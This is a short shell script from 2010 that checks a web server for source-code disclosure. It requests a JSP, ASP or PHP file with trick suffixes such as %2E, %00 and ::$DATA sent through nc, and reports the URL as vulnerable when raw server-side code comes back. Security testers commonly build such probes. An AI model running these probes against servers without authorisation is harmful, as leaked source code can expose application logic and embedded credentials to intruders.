#!/bin/sh

# source disclosure vulnerability check
#
# Copyright (C) 2010  Jeremy Bae
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#

function usage
{
  echo "Usage: $0 <url>"
  exit
}

if [ $# -ne 1 ]; then
  usage
fi

# sadly '*' is expanded, sigh~
PATTERNS='. %2E + %2B %2A \ %5C ? %3F %20 %00 ::$DATA'

URL=$1
TEMP=`echo $URL | awk 'BEGIN { FS="/" } { print $3 }'`
HOST=`echo $TEMP | awk 'BEGIN { FS=":" } { print $1 }'`
PORT=`echo $TEMP | awk 'BEGIN { FS=":" } { print $2 }'`
REQ=`echo $URL | awk 'BEGIN { FS="/" } { for (i=4; i<NF; i++) printf("%s/",$i) }'`
FILENAME=`echo $URL | awk 'BEGIN { FS="/" } { print $NF }'`
EXT=`echo $FILENAME | awk 'BEGIN { FS="." } { print $NF }'`

if [ -z $PORT ]
then
  PORT=80
fi
  
if [ $EXT = 'jsp' -o $EXT = 'JSP' -o $EXT = 'asp' -o $EXT = 'ASP' ]; then
  SRC='<%'
else if [ $EXT = 'php' -o $EXT = 'PHP' ]; then
  SRC='<?'
  fi
fi

for PATTERN in $PATTERNS
do
  RESULT=`echo -e "GET /$REQ$FILENAME$PATTERN HTTP/1.0\n\n" | nc $HOST $PORT | grep $SRC`
  STRLEN=`expr "$RESULT" : '.*'`
  if [ $STRLEN -gt 0 ]
  then
    echo "http://$HOST:$PORT/$REQ$FILENAME$PATTERN is vulnerable"
  fi
done
